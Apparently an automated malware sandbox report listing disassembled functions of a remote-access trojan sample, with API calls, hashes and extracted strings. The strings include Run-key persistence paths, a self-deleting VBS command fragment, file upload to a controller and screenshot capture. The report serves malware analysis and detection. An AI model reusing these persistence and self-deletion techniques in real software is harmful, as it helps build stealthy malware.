                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 020FC27A
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 020FC28D
                                                    • Part of subcall function 0210AD9F: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,020F3CA7), ref: 0210ADC6
                                                  • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000000), ref: 020FC4E7
                                                  • ExitProcess.KERNEL32 ref: 020FC4EE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentDeleteExecuteExitFileModuleNameObjectShellSingleTerminateWait
                                                  • String ID: @CG$On Error Resume Next$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$`=G$exepath$fso.DeleteFolder "$pth_unenc$while fso.FileExists("
                                                  • API String ID: 508158800-1730539264
                                                  • Opcode ID: a33fc09c9556ef91ef2cee6c22be68f1294df09e9ea1a498d22c8dae3f6f7800
                                                  • Instruction ID: eb6110731211debb429c001c255b8628a5824efd98826135799a3b3909f86a65
                                                  • Opcode Fuzzy Hash: a33fc09c9556ef91ef2cee6c22be68f1294df09e9ea1a498d22c8dae3f6f7800
                                                  • Instruction Fuzzy Hash: 5D81B3322843405FD7A9FB20D860EEF73AAAF90700F10443EFA46579D5EF64AD09DA56
                                                  Function 0041B824 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                  • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumOpen
                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                  • API String ID: 1332880857-3714951968
                                                  • Opcode ID: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                  • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                  • Opcode Fuzzy Hash: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                  • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                  Function 00444F3D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                  • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                  • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                  • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                  Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                  • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                  • __aulldiv.LIBCMT ref: 00407FE9
                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                  • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                  • API String ID: 1884690901-3066803209
                                                  • Opcode ID: ba36baefaf5fe41803c60f426781eece5a4c22298e84113410fa4c32010d96cc
                                                  • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                  • Opcode Fuzzy Hash: ba36baefaf5fe41803c60f426781eece5a4c22298e84113410fa4c32010d96cc
                                                  • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                  Function 020FC4F5 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 282registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02101900: TerminateProcess.KERNEL32(00000000,?,020FC8E4), ref: 02101910
                                                    • Part of subcall function 02101900: WaitForSingleObject.KERNEL32(000000FF,?,020FC8E4), ref: 02101923
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 020FC5F2
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 020FC605
                                                    • Part of subcall function 0210B7F6: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0210B90C,00000000,00000000,?), ref: 0210B835
                                                  • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000000), ref: 020FC899
                                                  • ExitProcess.KERNEL32 ref: 020FC8A5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileProcess$CreateDeleteExecuteExitModuleNameObjectShellSingleTerminateWait
                                                  • String ID: @CG$On Error Resume Next$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$`=G$exepath$fso.DeleteFolder "$while fso.FileExists("
                                                  • API String ID: 1359289687-1885488838
                                                  • Opcode ID: 4a4176d209088168477d8c341ab9c6af581995fbe5fc9bf84f99647e44242b62
                                                  • Instruction ID: 6069886694e7467f6e6499b1cf71edb4147114a91816dbaf5ac0ee75a6604ebf
                                                  • Opcode Fuzzy Hash: 4a4176d209088168477d8c341ab9c6af581995fbe5fc9bf84f99647e44242b62
                                                  • Instruction Fuzzy Hash: 0A91C6322843405FD3A4FB24D860EEF73AB9F90700F10443EEA46579A5EF64AD49DE56
                                                  Function 020FBECE Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 203COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 020FBEDC
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 020FBEF5
                                                  • _wcslen.LIBCMT ref: 020FBFBB
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 020FC043
                                                  • _wcslen.LIBCMT ref: 020FC09B
                                                  • CloseHandle.KERNEL32 ref: 020FC102
                                                  • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000001), ref: 020FC120
                                                  • ExitProcess.KERNEL32 ref: 020FC137
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen$CreateDirectory$CloseExecuteExitHandleProcessShell
                                                  • String ID: 6$C:\Users\user\Desktop\yPIOW6yoPi.exe$BG$BG
                                                  • API String ID: 3303048660-2327441383
                                                  • Opcode ID: 0ce300c52b2574979d2682925cabc15749f3fad58451f58e2d3683bc22aef4dd
                                                  • Instruction ID: 08c97c8486e03b3555e7d157962f8add40591530fd6c788c99996e3c709e4c70
                                                  • Opcode Fuzzy Hash: 0ce300c52b2574979d2682925cabc15749f3fad58451f58e2d3683bc22aef4dd
                                                  • Instruction Fuzzy Hash: E65108222843046FD6D8B7349C51FFF379B9F80744F10442EFA0596DD6EF549805EA6A
                                                  Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(00001388), ref: 00409E62
                                                    • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                    • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                    • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                    • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                  • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                  • API String ID: 3795512280-3163867910
                                                  • Opcode ID: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                  • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                  • Opcode Fuzzy Hash: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                  • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                  Function 020FA0AF Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(00001388), ref: 020FA0C9
                                                    • Part of subcall function 020F9FFE: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,020FA0D6), ref: 020FA034
                                                    • Part of subcall function 020F9FFE: GetFileSize.KERNEL32(00000000,00000000,?,?,?,020FA0D6), ref: 020FA043
                                                    • Part of subcall function 020F9FFE: Sleep.KERNEL32(00002710,?,?,?,020FA0D6), ref: 020FA070
                                                    • Part of subcall function 020F9FFE: CloseHandle.KERNEL32(00000000,?,?,?,020FA0D6), ref: 020FA077
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 020FA105
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 020FA116
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 020FA12D
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 020FA1A7
                                                    • Part of subcall function 0210B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B89A
                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 020FA2B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                  • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                  • API String ID: 3795512280-3163867910
                                                  • Opcode ID: f1eb223cb7d2e6894d1a2c78ceddde7f199078b5105718b7a6d2036e1116f8b0
                                                  • Instruction ID: 17589b7211b6a8874efeedd8214cf8ff24982be95156d90f0dc16a86b4d8e67c
                                                  • Opcode Fuzzy Hash: f1eb223cb7d2e6894d1a2c78ceddde7f199078b5105718b7a6d2036e1116f8b0
                                                  • Instruction Fuzzy Hash: 7B51DE313843045FCBA9BB708861AFE379BABC0300F04042DEF56A7AD5DF258909EA55
                                                  Function 0045006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                    • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                  • _free.LIBCMT ref: 004500A6
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                  • _free.LIBCMT ref: 004500C8
                                                  • _free.LIBCMT ref: 004500DD
                                                  • _free.LIBCMT ref: 004500E8
                                                  • _free.LIBCMT ref: 0045010A
                                                  • _free.LIBCMT ref: 0045011D
                                                  • _free.LIBCMT ref: 0045012B
                                                  • _free.LIBCMT ref: 00450136
                                                  • _free.LIBCMT ref: 0045016E
                                                  • _free.LIBCMT ref: 00450175
                                                  • _free.LIBCMT ref: 00450192
                                                  • _free.LIBCMT ref: 004501AA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                  • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                  • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                  • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                  Function 021402D4 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 02140318
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F567
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F579
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F58B
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F59D
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F5AF
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F5C1
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F5D3
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F5E5
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F5F7
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F609
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F61B
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F62D
                                                    • Part of subcall function 0213F54A: _free.LIBCMT ref: 0213F63F
                                                  • _free.LIBCMT ref: 0214030D
                                                    • Part of subcall function 02136D2C: HeapFree.KERNEL32(00000000,00000000,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?), ref: 02136D42
                                                    • Part of subcall function 02136D2C: GetLastError.KERNEL32(?,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?,?), ref: 02136D54
                                                  • _free.LIBCMT ref: 0214032F
                                                  • _free.LIBCMT ref: 02140344
                                                  • _free.LIBCMT ref: 0214034F
                                                  • _free.LIBCMT ref: 02140371
                                                  • _free.LIBCMT ref: 02140384
                                                  • _free.LIBCMT ref: 02140392
                                                  • _free.LIBCMT ref: 0214039D
                                                  • _free.LIBCMT ref: 021403D5
                                                  • _free.LIBCMT ref: 021403DC
                                                  • _free.LIBCMT ref: 021403F9
                                                  • _free.LIBCMT ref: 02140411
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                  • Instruction ID: 8a4563374bf0aee5d18d6233fee54d11180536f716a3e30866a004d90382fc5a
                                                  • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                  • Instruction Fuzzy Hash: E7316131684244EFEB65AA3AD844B5B7BEBEF09364F144429E59CD7160DF33AC40CB14
                                                  Function 0210119D Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 238threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcessId.KERNEL32 ref: 021011AC
                                                    • Part of subcall function 02102A3C: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 02102A4A
                                                    • Part of subcall function 02102A3C: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,020FBBB3,004660E0,00000001,000000AF,00465554), ref: 02102A65
                                                    • Part of subcall function 02102A3C: RegCloseKey.ADVAPI32(?,?,?,?,020FBBB3,004660E0,00000001,000000AF,00465554), ref: 02102A70
                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 021011E8
                                                  • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 0210124D
                                                    • Part of subcall function 0210271E: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 0210273E
                                                    • Part of subcall function 0210271E: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 0210275C
                                                    • Part of subcall function 0210271E: RegCloseKey.ADVAPI32(00000000), ref: 02102767
                                                  • CloseHandle.KERNEL32(00000000), ref: 021011F7
                                                    • Part of subcall function 0210A8ED: GetLocalTime.KERNEL32(00000000), ref: 0210A907
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 021014C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                  • String ID: 0DG$TTF$WDH$BG
                                                  • API String ID: 65172268-1505503698
                                                  • Opcode ID: cfd1e48dead6c5d3f6b6817fbfe2d8e6c01e86e7030477cd0b94be603cb5524d
                                                  • Instruction ID: f84e7e7ad867c44496a89037f13e781339e9bf9fed8f9eada3ec486b66b34828
                                                  • Opcode Fuzzy Hash: cfd1e48dead6c5d3f6b6817fbfe2d8e6c01e86e7030477cd0b94be603cb5524d
                                                  • Instruction Fuzzy Hash: A871C1326C43006FC654FB70DC95AEF73A6AF90350F40052EFA46929E1EF649909DEA7
                                                  Function 00419128 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0041912D
                                                  • 70165D90.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                  • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                  • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$70165CreateDirectoryH_prologLocalTime
                                                  • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                  • API String ID: 1387268161-65789007
                                                  • Opcode ID: 91d1b4f4dea65f3b826fcaa200c07d0103cb4320fd1aa60c718ca5279f5f8068
                                                  • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                  • Opcode Fuzzy Hash: 91d1b4f4dea65f3b826fcaa200c07d0103cb4320fd1aa60c718ca5279f5f8068
                                                  • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                  Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • connect.WS2_32(?,?,?), ref: 004042A5
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                  • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                  • API String ID: 994465650-2151626615
                                                  • Opcode ID: e3513f9c1ab322e1df1fdf0f0d61d53c5181b1f05cce72afbaf14f0eb0156f5d
                                                  • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                  • Opcode Fuzzy Hash: e3513f9c1ab322e1df1fdf0f0d61d53c5181b1f05cce72afbaf14f0eb0156f5d
                                                  • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                  Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                    • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                    • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                    • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                    • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                  • ExitProcess.KERNEL32 ref: 0040C832
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                  • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                  • API String ID: 1913171305-390638927
